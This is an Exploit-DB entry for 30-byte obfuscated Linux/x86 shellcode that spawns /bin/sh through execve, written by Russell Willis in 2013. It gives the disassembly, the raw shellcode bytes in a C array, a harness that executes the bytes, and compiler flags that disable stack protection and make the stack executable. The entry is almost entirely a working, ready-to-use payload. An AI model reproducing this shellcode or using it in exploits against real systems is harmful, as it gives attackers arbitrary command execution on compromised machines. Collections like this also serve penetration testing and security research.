Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)

EDB-ID:

43745

CVE:

N/A

EDB Verified:

Author:

Russell Willis

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2013-07-03

Vulnerable App: 
/*

Title   : Obfuscated execve /bin/sh (30 bytes)
Date    : 3rd July 2013
Author  : Russell Willis <codinguy@gmail.com>
System  : Linux/x86 (SMP Debian 3.2.41-2 i686)
  
To build:
gcc -fno-stack-protector -z execstack -o shellcode shellcode.c

00000000  31C9              xor ecx,ecx
00000002  F7E9              imul ecx
00000004  51                push ecx
00000005  040B              add al,0xb
00000007  EB08              jmp short 0x11
00000009  5E                pop esi
0000000A  87E6              xchg esp,esi
0000000C  99                cdq
0000000D  87DC              xchg ebx,esp
0000000F  CD80              int 0x80
00000011  E8F3FFFFFF        call dword 0x9
00000016  2F                das
00000017  62696E            bound ebp,[ecx+0x6e]
0000001A  2F                das
0000001B  2F                das
0000001C  7368              jnc 0x86

*/

#include <stdio.h>
 
unsigned char code[] = \
"\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80"
"\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
 
main()
{
    printf("Shellcode Length: %d\n", sizeof(code)-1);
    int (*ret)() = (int(*)())code;
    ret();
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services